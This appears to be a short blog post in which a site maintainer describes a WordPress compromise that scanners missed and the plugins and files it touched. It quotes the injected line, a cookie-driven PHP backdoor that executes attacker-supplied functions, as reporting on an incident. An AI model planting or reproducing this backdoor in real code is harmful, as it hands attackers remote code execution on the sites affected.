New WP Hack

So this new hit me pretty hard today. Normal WordPress hack I go through the plugins, see what’s infected, and work my way out. This time? Nope. Heck, even Google’s Safe Browsing Site Status came back as “Not Dangerous”. Online scanners came back clean, and was beginning to question what was what when, lo and behold in the Google SERP: This site may be hacked.

Something was amiss. The plugin CodeGuard was installed and activated. From their service: “When a change is detected, we will alert you and take a new backup of your database and site content.” There are a lot of backups in the site, and I wondered if the site owner was ever notified, or even cared. Upon closer inspection the API for the service was not set. 

All files were touched by the hack, the line:

if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);

added to each core file. index.php, .htaccess and file in root called post.php where altered/added respectively. Because of their size I put them up on github at:

Yep, this server was rooted.





Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s